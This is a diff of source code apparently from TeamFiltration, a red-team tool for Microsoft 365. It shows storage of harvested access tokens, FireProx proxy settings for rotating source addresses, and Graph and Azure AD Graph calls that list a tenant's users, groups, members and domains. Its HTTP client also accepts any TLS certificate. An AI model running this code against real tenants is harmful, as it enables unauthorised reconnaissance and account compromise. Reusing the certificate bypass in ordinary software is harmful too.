+			return pulledTokens.Find(x => x.Username.ToLower().Equals(Username.ToLower()) && x.ResourceUri.Contains(resourceHost)).OrderByDescending(x => x.DateTime).ToList();
+		}
+
+
+		internal bool DeleteToken(PulledTokens token)
+		{
+			var pulledTokens = _globalDatabase.GetCollection<PulledTokens>("tokens");
+			return pulledTokens.Delete(token.Id);
+		}
+
+
+		internal List<PulledTokens> QueryTokens(SprayAttempt account)
+		{
+			var pulledTokens = _globalDatabase.GetCollection<PulledTokens>("tokens");
+			return pulledTokens.Find(x => x.Username.Equals(account.Username)).OrderByDescending(x => x.DateTime).ToList();
+		}
+
+		internal void WriteToken(PulledTokens account)
+		{
+			account.DateTime = DateTime.Now;
+			var collectionLink = _globalDatabase.GetCollection<PulledTokens>("tokens");
+			collectionLink.EnsureIndex(x => x.Id, true);
+			collectionLink.Upsert(account);
+			_globalDatabase.Checkpoint();
+		}
+
+
+	}
 
 }

--- a/TeamFiltration/TeamFiltration/Handlers/GlobalArgumentsHandler.cs
+++ b/TeamFiltration/TeamFiltration/Handlers/GlobalArgumentsHandler.cs
@@ -15,165 +15,163 @@ using TeamFiltration.Models.TeamFiltration;
 namespace TeamFiltration.Handlers
 {
 
-    public class GlobalArgumentsHandler
-    {
-        public string OutPutPath { get; set; }
+	public class GlobalArgumentsHandler
+	{
+		public string OutPutPath { get; set; }
 
-        public Config TeamFiltrationConfig { get; set; }
-        public bool DebugMode { get; set; }
-        public bool UsCloud { get; set; }
-        public bool AADSSO { get; set; }
-        public bool PushoverLocked { get; set; }
-        public bool Pushover { get; set; }
-        public int OwaLimit { get; set; }
-        private Pushover _pushClient { get; set; }
-        public AWSHandler _awsHandler { get; set; }
- 
-        private DomainParser _domainParser { get; set; }
-        public string[] AWSRegions { get; set; } = { "us-east-1", "us-west-1", "us-west-2", "ca-central-1", "eu-central-1", "eu-west-1", "eu-west-2", "eu-west-3", "eu-north-1" };
-        public bool ADFS { get; internal set; }
+		public Config TeamFiltrationConfig { get; set; }
+		public bool DebugMode { get; set; }
+		public bool UsCloud { get; set; }
+		public bool AADSSO { get; set; }
+		public bool PushoverLocked { get; set; }
+		public bool Pushover { get; set; }
+		public int OwaLimit { get; set; }
+		private Pushover _pushClient { get; set; }
+		public AWSHandler _awsHandler { get; set; }
 
-        public GlobalArgumentsHandler(string[] args, DatabaseHandler databaseHandler, bool exfilModule = false)
-        {
+		private DomainParser _domainParser { get; set; }
+		public string[] AWSRegions { get; set; } = { "us-east-1", "us-west-1", "us-west-2", "ca-central-1", "eu-central-1", "eu-west-1", "eu-west-2", "eu-west-3", "eu-north-1" };
+		public bool ADFS { get; internal set; }
 
-            //Really need to move away from this, but it's a quick fix for now
-            var httpClient = new HttpClient();
-            var cacheProvider = new Nager.PublicSuffix.RuleProviders.CacheProviders.LocalFileSystemCacheProvider();
-            var ruleProvider = new CachedHttpRuleProvider(cacheProvider, httpClient);
+		public GlobalArgumentsHandler(string[] args, DatabaseHandler databaseHandler, bool exfilModule = false)
+		{
 
-            ruleProvider.BuildAsync().GetAwaiter().GetResult();
+			//Really need to move away from this, but it's a quick fix for now
+			var httpClient = new HttpClient();
+			var cacheProvider = new Nager.PublicSuffix.RuleProviders.CacheProviders.LocalFileSystemCacheProvider();
+			var ruleProvider = new CachedHttpRuleProvider(cacheProvider, httpClient);
 
-            _domainParser = new DomainParser(ruleProvider);
+			ruleProvider.BuildAsync().GetAwaiter().GetResult();
 
-            OutPutPath = args.GetValue("--outpath");
-            AADSSO = args.Contains("--aad-sso");
+			_domainParser = new DomainParser(ruleProvider);
 
-            PushoverLocked = args.Contains("--push-locked");
-            Pushover = args.Contains("--push");
-            UsCloud = args.Contains("--us-cloud");
-            this.DebugMode = args.Contains("--debug");
+			OutPutPath = args.GetValue("--outpath");
+			AADSSO = args.Contains("--aad-sso");
 
-
-            var teamFiltrationConfigPath = args.GetValue("--config");
-            string OwaLimitString = args.GetValue("--owa-limit");
+			PushoverLocked = args.Contains("--push-locked");
+			Pushover = args.Contains("--push");
+			UsCloud = args.Contains("--us-cloud");
+			this.DebugMode = args.Contains("--debug");
 
 
-            
-            if (string.IsNullOrEmpty(teamFiltrationConfigPath) && File.Exists("TeamFiltrationConfig.json"))
-            {
-                teamFiltrationConfigPath = "TeamFiltrationConfig.json";
-            }
-            
-            if (!File.Exists(teamFiltrationConfigPath))
-            {
-                if (!exfilModule)
-                {
-                    Console.WriteLine("[+] Could not find TeamFiltration config, provide a config path using with --config");
-                    return;
-                }
-                else
-                {
-                    Console.WriteLine("[!] You are running TeamFiltration without a config");
-                   
-                }
-
-            }
-            else
-            {
-                var configText = File.ReadAllText(teamFiltrationConfigPath);
-                TeamFiltrationConfig = JsonConvert.DeserializeObject<Config>(configText);
-            }
+			var teamFiltrationConfigPath = args.GetValue("--config");
+			string OwaLimitString = args.GetValue("--owa-limit");
 
 
-            Int32.TryParse(OwaLimitString, out var LocalOwaLimit);
-            if (LocalOwaLimit > 0)
-                OwaLimit = LocalOwaLimit;
-            else
-                OwaLimit = 2000;
 
-            if(TeamFiltrationConfig == null)
-            {
-                TeamFiltrationConfig = new Config() { };
-            }
+			if (string.IsNullOrEmpty(teamFiltrationConfigPath) && File.Exists("TeamFiltrationConfig.json"))
+			{
+				teamFiltrationConfigPath = "TeamFiltrationConfig.json";
+			}
 
-            // Set default user agent if missing
-            if (string.IsNullOrEmpty(TeamFiltrationConfig?.UserAgent))
-                TeamFiltrationConfig.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.3.00.30866 Chrome/80.0.3987.165 Electron/8.5.1 Safari/537.36";
-            
-            // Set default user agent if missing
-            if (string.IsNullOrEmpty(TeamFiltrationConfig?.proxyEndpoint))
-                TeamFiltrationConfig.proxyEndpoint = "http://127.0.0.1:8080";
+			if (!File.Exists(teamFiltrationConfigPath))
+			{
+				if (!exfilModule)
+				{
+					Console.WriteLine("[+] Could not find TeamFiltration config, provide a config path using with --config");
+					return;
+				}
+				else
+				{
+					Console.WriteLine("[!] You are running TeamFiltration without a config");
 
+				}
 
-            if (TeamFiltrationConfig?.AwsRegions?.Count() > 0)
-            {
-                AWSRegions = TeamFiltrationConfig.AwsRegions.ToArray();
-               
-            }
-
-            try
-            {
-                if (!string.IsNullOrEmpty(TeamFiltrationConfig?.PushoverUserKey) && !string.IsNullOrEmpty(TeamFiltrationConfig?.PushoverAppKey))
-                    _pushClient = new Pushover(TeamFiltrationConfig.PushoverAppKey);
-            }
-            catch (Exception ex)
-            {
-
-                Console.WriteLine($"[!] Failed to create Pushover client, bad API keys? -> {ex}");
-            }
+			}
+			else
+			{
+				var configText = File.ReadAllText(teamFiltrationConfigPath);
+				TeamFiltrationConfig = JsonConvert.DeserializeObject<Config>(configText);
+			}
 
 
-            //Do AWS FireProx generation checks
-            if (!string.IsNullOrEmpty(TeamFiltrationConfig?.AWSSecretKey) && !string.IsNullOrEmpty(TeamFiltrationConfig?.AWSAccessKey))
-            {
-                _awsHandler = new AWSHandler(this.TeamFiltrationConfig.AWSAccessKey, this.TeamFiltrationConfig.AWSSecretKey, this.TeamFiltrationConfig.AWSSessionToken, databaseHandler);
+			Int32.TryParse(OwaLimitString, out var LocalOwaLimit);
+			if (LocalOwaLimit > 0)
+				OwaLimit = LocalOwaLimit;
+			else
+				OwaLimit = 2000;
 
-            }
-      
-        }
-        public void PushAlert(string title, string message)
-        {
-            if (_pushClient != null)
-            {
-                if (Pushover || PushoverLocked)
-                {
-                    try
-                    {
-                        PushResponse response = _pushClient.Push(
-                            title,
-                            message,
-                            TeamFiltrationConfig.PushoverUserKey
-                        );
-                    }
-                    catch (Exception ex)
-                    {
-                        Console.WriteLine($"[!] Pushover message failed, error: {ex}");
-                    }
-                }
-            }
+			if (TeamFiltrationConfig == null)
+			{
+				TeamFiltrationConfig = new Config() { };
+			}
 
-        }
-        public string GetBaseUrl(string region = "US")
-        {
-            return "https://login.microsoftonline.com/common/oauth2/token";
-        }
+			// Set default user agent if missing
+			if (string.IsNullOrEmpty(TeamFiltrationConfig?.UserAgent))
+				TeamFiltrationConfig.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.3.00.30866 Chrome/80.0.3987.165 Electron/8.5.1 Safari/537.36";
 
-        public (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) GetFireProxURLObject(string url, int regionCounter)
-        {
-            var currentRegion = this.AWSRegions[regionCounter];
-            var domainBase = _domainParser.Parse(url);
-            (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint) awsEndpoint = _awsHandler.CreateFireProxEndPoint(url, domainBase.Domain, currentRegion).GetAwaiter().GetResult();
-            return (awsEndpoint.Item1, awsEndpoint.Item2, $"https://{awsEndpoint.Item1.RestApiId}.execute-api.{currentRegion}.amazonaws.com/fireprox/");
+			// Set default user agent if missing
+			if (string.IsNullOrEmpty(TeamFiltrationConfig?.proxyEndpoint))
+				TeamFiltrationConfig.proxyEndpoint = "http://127.0.0.1:8080";
 
 
-        }
-        private string EnsurePathChar(string outPutPath)
-        {
-            foreach (var invalidChar in Path.GetInvalidPathChars())
-            {
-                outPutPath = outPutPath.Replace(invalidChar, Path.DirectorySeparatorChar);
-            }
-            return outPutPath;
-        }
-    }
+			if (TeamFiltrationConfig?.AwsRegions?.Count() > 0)
+			{
+				AWSRegions = TeamFiltrationConfig.AwsRegions.ToArray();
+
+			}
+
+			try
+			{
+				if (!string.IsNullOrEmpty(TeamFiltrationConfig?.PushoverUserKey) && !string.IsNullOrEmpty(TeamFiltrationConfig?.PushoverAppKey))
+					_pushClient = new Pushover(TeamFiltrationConfig.PushoverAppKey);
+			}
+			catch (Exception ex)
+			{
+
+				Console.WriteLine($"[!] Failed to create Pushover client, bad API keys? -> {ex}");
+			}
+
+
+			//Do AWS FireProx generation checks
+			if (!string.IsNullOrEmpty(TeamFiltrationConfig?.AWSSecretKey) && !string.IsNullOrEmpty(TeamFiltrationConfig?.AWSAccessKey))
+			{
+				_awsHandler = new AWSHandler(this.TeamFiltrationConfig.AWSAccessKey, this.TeamFiltrationConfig.AWSSecretKey, this.TeamFiltrationConfig.AWSSessionToken, databaseHandler);
+
+			}
+
+		}
+		public void PushAlert(string title, string message)
+		{
+			if (_pushClient != null)
+			{
+				if (Pushover || PushoverLocked)
+				{
+					try
+					{
+						PushResponse response = _pushClient.Push(
+							title,
+							message,
+							TeamFiltrationConfig.PushoverUserKey
+						);
+					}
+					catch (Exception ex)
+					{
+						Console.WriteLine($"[!] Pushover message failed, error: {ex}");
+					}
+				}
+			}
+
+		}
+		public string GetBaseUrl(string region = "US")
+		{
+			return "https://login.microsoftonline.com/common/oauth2/token";
+		}
+
+		public (Amazon.APIGateway.Model.CreateDeploymentRequest, Models.AWS.FireProxEndpoint, string fireProxUrl) GetFireProxURLObject(string url, int regionCounter)
+		{
+			string fireProxUrl = url.TrimEnd('/');
+			fireProxUrl += "/";
+
+			return (null, null, fireProxUrl);
+		}
+		private string EnsurePathChar(string outPutPath)
+		{
+			foreach (var invalidChar in Path.GetInvalidPathChars())
+			{
+				outPutPath = outPutPath.Replace(invalidChar, Path.DirectorySeparatorChar);
+			}
+			return outPutPath;
+		}
+	}
 }

--- a/TeamFiltration/TeamFiltration/Handlers/GraphHandler.cs
+++ b/TeamFiltration/TeamFiltration/Handlers/GraphHandler.cs
@@ -5,6 +5,7 @@ using System.Collections.Generic;
 using System.IO;
 using System.Net;
 using System.Net.Http;
+using System.Net.NetworkInformation;
 using System.Security.Authentication;
 using System.Text;
 using System.Threading.Tasks;
@@ -15,246 +16,249 @@ using TeamFiltration.Models.Teams;
 
 namespace TeamFiltration.Handlers
 {
-    class GraphHandler
-    {
+	class GraphHandler
+	{
+
+		private GlobalArgumentsHandler _globalProperties;
+
+
+		private HttpClient _graphClient;
+		public GraphHandler(BearerTokenResp getBearToken, string username, GlobalArgumentsHandler globalProperties, bool debugMode = false)
+		{
+			_globalProperties = globalProperties;
+
+			// This is for debug , eg burp
+			var proxy = new WebProxy
+			{
+				Address = new Uri(_globalProperties.TeamFiltrationConfig.proxyEndpoint),
+				BypassProxyOnLocal = false,
+				UseDefaultCredentials = false,
+
+			};
+
+			var httpClientHandler = new HttpClientHandler
+			{
+				Proxy = proxy,
+				ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) =>
+				{
+
+					return true;
+				},
+				SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls,
+				UseProxy = debugMode
+			};
+
+			_graphClient = new HttpClient(httpClientHandler);
+			_graphClient.DefaultRequestHeaders.Add("Authorization", $"Bearer {getBearToken.access_token}");
+
+
+		}
+
+		public async Task<GetMembers> GetGroupMembersMsGraph(string groupId)
+		{
+
+			//TODO: Implement paging for the grap ms API
+			var getGroupMemReq = await _graphClient.PollyGetAsync($"https://graph.microsoft.com/v1.0/groups/{groupId}/members");
+			var getGroupMemResp = await getGroupMemReq.Content.ReadAsStringAsync();
+			var getGroupMemDataResp = JsonConvert.DeserializeObject<GetMembers>(getGroupMemResp);
+
+			return getGroupMemDataResp;
+		}
+		public async Task<DomainIdResp> GetDomainMsGraph(string domainId)
+		{
+			//TODO: Implement paging for the grap ms API
+			var GetDomainsMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/domains/" + domainId);
+			var GetDomainsMsGraphResp = await GetDomainsMsGraphReq.Content.ReadAsStringAsync();
+			var GetDomainsMsGraphDataResp = JsonConvert.DeserializeObject<DomainIdResp>(GetDomainsMsGraphResp);
+
+			return GetDomainsMsGraphDataResp;
+		}
+		public async Task<DomainsResp> GetDomainsMsGraph()
+		{
+
+			var GetDomainsMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/domains");
+			var GetDomainsMsGraphResp = await GetDomainsMsGraphReq.Content.ReadAsStringAsync();
+			var GetDomainsMsGraphDataResp = JsonConvert.DeserializeObject<DomainsResp>(GetDomainsMsGraphResp);
+
+			bool fetchedAll = false;
+			if (string.IsNullOrEmpty(GetDomainsMsGraphDataResp.odatanextLink))
+				fetchedAll = true;
+
+			while (!fetchedAll)
+			{
+
+				var GetDomainsMsGraphReqNextLink = await _graphClient.PollyGetAsync(GetDomainsMsGraphDataResp.odatanextLink);
+				var GetDomainsMsGraphReqNext = await GetDomainsMsGraphReqNextLink.Content.ReadAsStringAsync();
+				var GetDomainsMsGraphRespNext = JsonConvert.DeserializeObject<DomainsResp>(GetDomainsMsGraphReqNext);
+				GetDomainsMsGraphDataResp.value.AddRange(GetDomainsMsGraphRespNext.value);
+				GetDomainsMsGraphDataResp.odatanextLink = GetDomainsMsGraphRespNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(GetDomainsMsGraphDataResp.odatanextLink))
+					fetchedAll = true;
+			}
+			return GetDomainsMsGraphDataResp;
+		}
+		public async Task<GroupsResp> GetGroupsMsGraph()
+		{
+
+			var getGroupsMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/groups?$top=800&$select=mailNickname,id,displayName");
+			var getGroupsMsGraphResp = await getGroupsMsGraphReq.Content.ReadAsStringAsync();
+			var getGroupsMsGraphDataResp = JsonConvert.DeserializeObject<GroupsResp>(getGroupsMsGraphResp);
+
+			bool fetchedAll = false;
+			if (string.IsNullOrEmpty(getGroupsMsGraphDataResp.odatanextLink))
+				fetchedAll = true;
+
+
+			while (!fetchedAll)
+			{
+
+				var getGroupsMsGraphReqNext = await _graphClient.PollyGetAsync(getGroupsMsGraphDataResp.odatanextLink);
+				var getGroupsMsGraphRespNext = await getGroupsMsGraphReqNext.Content.ReadAsStringAsync();
+				var getGroupsMsGraphRespDataNext = JsonConvert.DeserializeObject<GroupsResp>(getGroupsMsGraphRespNext);
+				getGroupsMsGraphDataResp.Value.AddRange(getGroupsMsGraphRespDataNext.Value);
+				getGroupsMsGraphDataResp.odatanextLink = getGroupsMsGraphRespDataNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(getGroupsMsGraphDataResp.odatanextLink))
+					fetchedAll = true;
+
+			}
+			return getGroupsMsGraphDataResp;
+		}
+		public async Task<UsersResp> GetUsersMsGraph()
+		{
+
+			var getUsersMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/users");
+			var getUsersMsGraphResp = await getUsersMsGraphReq.Content.ReadAsStringAsync();
+			var getUsersMsGraphDataResp = JsonConvert.DeserializeObject<UsersResp>(getUsersMsGraphResp);
+
+			bool fetchedAll = false;
+			if (string.IsNullOrEmpty(getUsersMsGraphDataResp.odatanextLink))
+				fetchedAll = true;
+
+			while (!fetchedAll)
+			{
+
+				var getUsersMsGraphNextReq = await _graphClient.PollyGetAsync(getUsersMsGraphDataResp.odatanextLink);
+				var getUsersMsGraphRespNext = await getUsersMsGraphNextReq.Content.ReadAsStringAsync();
+				var getUsersMsGraphDataRespNext = JsonConvert.DeserializeObject<UsersResp>(getUsersMsGraphRespNext);
+				getUsersMsGraphDataResp.value.AddRange(getUsersMsGraphDataRespNext.value);
+				getUsersMsGraphDataResp.odatanextLink = getUsersMsGraphDataRespNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(getUsersMsGraphDataResp.odatanextLink))
+					fetchedAll = true;
+			}
+			return getUsersMsGraphDataResp;
+		}
+		public async Task<DomainRespAAD> GetDomainsAdGraph(string tenantId)
+		{
+			bool fetchedAll = false;
+
+			var GetDomainsAdGraphReq = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/domains?&api-version=1.6");
+			var GetDomainsAdGraphResp = await GetDomainsAdGraphReq.Content.ReadAsStringAsync();
+			var GetDomainsAdGraphDataResp = JsonConvert.DeserializeObject<DomainRespAAD>(GetDomainsAdGraphResp);
+
+
+			if (string.IsNullOrEmpty(GetDomainsAdGraphDataResp.odatanextLink))
+				fetchedAll = true;
+
+			while (!fetchedAll)
+			{
+				var GetDomainsAdGrahSkipToken = GetDomainsAdGraphDataResp.odatanextLink.Split("skiptoken=")[1];
+				var GetDomainsAdGraphReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/domains?&api-version=1.6&$skiptoken=" + GetDomainsAdGrahSkipToken);
+				var GetDomainsAdGraphRespNext = await GetDomainsAdGraphReqNext.Content.ReadAsStringAsync();
+				var GetDomainsAdGraphRespDataNext = JsonConvert.DeserializeObject<DomainRespAAD>(GetDomainsAdGraphRespNext);
+
+				GetDomainsAdGraphDataResp.value.AddRange(GetDomainsAdGraphRespDataNext.value);
+				GetDomainsAdGraphDataResp.odatanextLink = GetDomainsAdGraphRespDataNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(GetDomainsAdGraphDataResp.odatanextLink))
+					fetchedAll = true;
+			}
+			return GetDomainsAdGraphDataResp;
+		}
+		public async Task<GroupsRespAAD> GetGroupsAdGraph(string tenantId)
+		{
+
+			var getGroupsAdGraphReq = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups?&api-version=1.6&$top=800&$select=objectType,description,objectId,displayName,mailNickname,onPremisesSamAccountName");
+			var getGroupsAdGraphResp = await getGroupsAdGraphReq.Content.ReadAsStringAsync();
+			var getGroupsAdGraphDataResp = JsonConvert.DeserializeObject<GroupsRespAAD>(getGroupsAdGraphResp);
+
+			bool fetchedAll = false;
+			if (string.IsNullOrEmpty(getGroupsAdGraphDataResp.odatanextLink))
+				fetchedAll = true;
+
+
+			while (!fetchedAll)
+			{
+				var getGroupsAdGraphNextLink = getGroupsAdGraphDataResp.odatanextLink.Split("skiptoken=")[1];
+				var getGroupsAdGraphReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups?&api-version=1.6&$top=800&$select=objectType,description,objectId,displayName,mailNickname,onPremisesSamAccountName&$skiptoken=" + getGroupsAdGraphNextLink);
+				var getGroupsAdGraphRespNext = await getGroupsAdGraphReqNext.Content.ReadAsStringAsync();
+				var getGroupsAdGraphRespDataNext = JsonConvert.DeserializeObject<GroupsRespAAD>(getGroupsAdGraphRespNext);
+				getGroupsAdGraphDataResp.value.AddRange(getGroupsAdGraphRespDataNext.value);
+				getGroupsAdGraphDataResp.odatanextLink = getGroupsAdGraphRespDataNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(getGroupsAdGraphDataResp.odatanextLink))
+					fetchedAll = true;
+
+			}
+			return getGroupsAdGraphDataResp;
+		}
+		public async Task<GetMembersAAD> GetGroupMembersAdGraph(string groupId, string tenantId)
+		{
+			bool fetchedAll = false;
+
+			var getGroupMemReq = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups/{groupId}/members?&api-version=1.6&$select=userPrincipalName,mail,mailNickname,objectId,displayName,facsimileTelephoneNumber,department,mobile");
+			var getGroupMemResp = await getGroupMemReq.Content.ReadAsStringAsync();
+			var getGroupMemDataResp = JsonConvert.DeserializeObject<GetMembersAAD>(getGroupMemResp);
+
+			if (string.IsNullOrEmpty(getGroupMemDataResp.odatanextLink))
+				fetchedAll = true;
+
+			while (!fetchedAll)
+			{
+				var getGroupMemSkipToken = getGroupMemDataResp.odatanextLink.Split("skiptoken=")[1];
+				var getGroupMemReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/groups/{groupId}/members?&api-version=1.6&$select=userPrincipalName,mail,mailNickname,objectId,displayName,facsimileTelephoneNumber,department,mobile&$skiptoken=" + getGroupMemSkipToken);
+				var getGroupMemRespNext = await getGroupMemReqNext.Content.ReadAsStringAsync();
+				var getGroupMemDataRespNext = JsonConvert.DeserializeObject<GetMembersAAD>(getGroupMemRespNext);
+
+				getGroupMemDataResp.value.AddRange(getGroupMemDataRespNext.value);
+				getGroupMemDataResp.odatanextLink = getGroupMemDataRespNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(getGroupMemDataResp.odatanextLink))
+					fetchedAll = true;
+			}
+
+			return getGroupMemDataResp;
+		}
+		public async Task<UserRespAAD> GetUsersAdGraph(string tenantId)
+		{
+
+			var getUsersAdGraph = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/users?&api-version=1.6");
+			var getUsersAdGraphResp = await getUsersAdGraph.Content.ReadAsStringAsync();
+			var getUsersAdGraphDataResp = JsonConvert.DeserializeObject<UserRespAAD>(getUsersAdGraphResp);
+
+			bool fetchedAll = false;
+			if (string.IsNullOrEmpty(getUsersAdGraphDataResp.odatanextLink))
+				fetchedAll = true;
+
+			while (!fetchedAll)
+			{
+
+				var getUsersAdGraphSkipToken = getUsersAdGraphDataResp.odatanextLink.Split("skiptoken=")[1];
+				var getUsersAdGraphReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/users?&api-version=1.6&$skiptoken=" + getUsersAdGraphSkipToken);
+				var getUsersAdGraphRespNext = await getUsersAdGraphReqNext.Content.ReadAsStringAsync();
+				var getUsersAdGraphDataRespNext = JsonConvert.DeserializeObject<UserRespAAD>(getUsersAdGraphRespNext);
+				getUsersAdGraphDataResp.value.AddRange(getUsersAdGraphDataRespNext.value);
+				getUsersAdGraphDataResp.odatanextLink = getUsersAdGraphDataRespNext.odatanextLink;
+
+				if (string.IsNullOrEmpty(getUsersAdGraphDataResp.odatanextLink))
+					fetchedAll = true;
+			}
+			return getUsersAdGraphDataResp;
+		}
 
 
 
-        private HttpClient _graphClient;
-        public GraphHandler(BearerTokenResp getBearToken, string username, bool debugMode = false)
-        {
-            // This is for debug , eg burp
-            var proxy = new WebProxy
-            {
-                Address = new Uri($"http://127.0.0.1:8080"), 
-                BypassProxyOnLocal = false,
-                UseDefaultCredentials = false,
-
-            };
-
-            var httpClientHandler = new HttpClientHandler
-            {
-                Proxy = proxy,
-                ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) =>
-                {
-
-                    return true;
-                },
-                SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls,
-                UseProxy = debugMode
-            };
-
-            _graphClient = new HttpClient(httpClientHandler);
-            _graphClient.DefaultRequestHeaders.Add("Authorization", $"Bearer {getBearToken.access_token}");
-
-
-        }
-       
-        public async Task<GetMembers> GetGroupMembersMsGraph(string groupId)
-        {
-         
-            //TODO: Implement paging for the grap ms API
-            var getGroupMemReq = await _graphClient.PollyGetAsync($"https://graph.microsoft.com/v1.0/groups/{groupId}/members");
-            var getGroupMemResp = await getGroupMemReq.Content.ReadAsStringAsync();
-            var getGroupMemDataResp = JsonConvert.DeserializeObject<GetMembers>(getGroupMemResp);
-
-            return getGroupMemDataResp;
-        }
-        public async Task<DomainIdResp> GetDomainMsGraph(string domainId)
-        {
-            //TODO: Implement paging for the grap ms API
-            var GetDomainsMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/domains/" + domainId);
-            var GetDomainsMsGraphResp = await GetDomainsMsGraphReq.Content.ReadAsStringAsync();
-            var GetDomainsMsGraphDataResp = JsonConvert.DeserializeObject<DomainIdResp>(GetDomainsMsGraphResp);
-
-            return GetDomainsMsGraphDataResp;
-        }
-        public async Task<DomainsResp> GetDomainsMsGraph()
-        {
-
-            var GetDomainsMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/domains");
-            var GetDomainsMsGraphResp = await GetDomainsMsGraphReq.Content.ReadAsStringAsync();
-            var GetDomainsMsGraphDataResp = JsonConvert.DeserializeObject<DomainsResp>(GetDomainsMsGraphResp);
-
-            bool fetchedAll = false;
-            if (string.IsNullOrEmpty(GetDomainsMsGraphDataResp.odatanextLink))
-                fetchedAll = true;
-
-            while (!fetchedAll)
-            {
-
-                var GetDomainsMsGraphReqNextLink = await _graphClient.PollyGetAsync(GetDomainsMsGraphDataResp.odatanextLink);
-                var GetDomainsMsGraphReqNext = await GetDomainsMsGraphReqNextLink.Content.ReadAsStringAsync();
-                var GetDomainsMsGraphRespNext = JsonConvert.DeserializeObject<DomainsResp>(GetDomainsMsGraphReqNext);
-                GetDomainsMsGraphDataResp.value.AddRange(GetDomainsMsGraphRespNext.value);
-                GetDomainsMsGraphDataResp.odatanextLink = GetDomainsMsGraphRespNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(GetDomainsMsGraphDataResp.odatanextLink))
-                    fetchedAll = true;
-            }
-            return GetDomainsMsGraphDataResp;
-        }
-        public async Task<GroupsResp> GetGroupsMsGraph()
-        {
-
-            var getGroupsMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/groups?$top=800&$select=mailNickname,id,displayName");
-            var getGroupsMsGraphResp = await getGroupsMsGraphReq.Content.ReadAsStringAsync();
-            var getGroupsMsGraphDataResp = JsonConvert.DeserializeObject<GroupsResp>(getGroupsMsGraphResp);
-
-            bool fetchedAll = false;
-            if (string.IsNullOrEmpty(getGroupsMsGraphDataResp.odatanextLink))
-                fetchedAll = true;
-
-
-            while (!fetchedAll)
-            {
-
-                var getGroupsMsGraphReqNext = await _graphClient.PollyGetAsync(getGroupsMsGraphDataResp.odatanextLink);
-                var getGroupsMsGraphRespNext = await getGroupsMsGraphReqNext.Content.ReadAsStringAsync();
-                var getGroupsMsGraphRespDataNext = JsonConvert.DeserializeObject<GroupsResp>(getGroupsMsGraphRespNext);
-                getGroupsMsGraphDataResp.Value.AddRange(getGroupsMsGraphRespDataNext.Value);
-                getGroupsMsGraphDataResp.odatanextLink = getGroupsMsGraphRespDataNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(getGroupsMsGraphDataResp.odatanextLink))
-                    fetchedAll = true;
-
-            }
-            return getGroupsMsGraphDataResp;
-        }
-        public async Task<UsersResp> GetUsersMsGraph()
-        {
-
-            var getUsersMsGraphReq = await _graphClient.PollyGetAsync("https://graph.microsoft.com/v1.0/users");
-            var getUsersMsGraphResp = await getUsersMsGraphReq.Content.ReadAsStringAsync();
-            var getUsersMsGraphDataResp = JsonConvert.DeserializeObject<UsersResp>(getUsersMsGraphResp);
-
-            bool fetchedAll = false;
-            if (string.IsNullOrEmpty(getUsersMsGraphDataResp.odatanextLink))
-                fetchedAll = true;
-
-            while (!fetchedAll)
-            {
-
-                var getUsersMsGraphNextReq = await _graphClient.PollyGetAsync(getUsersMsGraphDataResp.odatanextLink);
-                var getUsersMsGraphRespNext = await getUsersMsGraphNextReq.Content.ReadAsStringAsync();
-                var getUsersMsGraphDataRespNext = JsonConvert.DeserializeObject<UsersResp>(getUsersMsGraphRespNext);
-                getUsersMsGraphDataResp.value.AddRange(getUsersMsGraphDataRespNext.value);
-                getUsersMsGraphDataResp.odatanextLink = getUsersMsGraphDataRespNext.odatanextLink;
-
-                if (string.IsNullOrEmpty(getUsersMsGraphDataResp.odatanextLink))
-                    fetchedAll = true;
-            }
-            return getUsersMsGraphDataResp;
-        }
-        public async Task<DomainRespAAD> GetDomainsAdGraph(string tenantId)
-        {
-            bool fetchedAll = false;
-
-            var GetDomainsAdGraphReq = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/domains?&api-version=1.6");
-            var GetDomainsAdGraphResp = await GetDomainsAdGraphReq.Content.ReadAsStringAsync();
-            var GetDomainsAdGraphDataResp = JsonConvert.DeserializeObject<DomainRespAAD>(GetDomainsAdGraphResp);
-
-         
-            if (string.IsNullOrEmpty(GetDomainsAdGraphDataResp.odatanextLink))
-                fetchedAll = true;
-
-            while (!fetchedAll)
-            {
-                var GetDomainsAdGrahSkipToken = GetDomainsAdGraphDataResp.odatanextLink.Split("skiptoken=")[1];
-                var GetDomainsAdGraphReqNext = await _graphClient.PollyGetAsync($"https://graph.windows.net/{tenantId}/domains?&api-version=1.6&$skiptoken=" + GetDomainsAdGrahSkipToken);
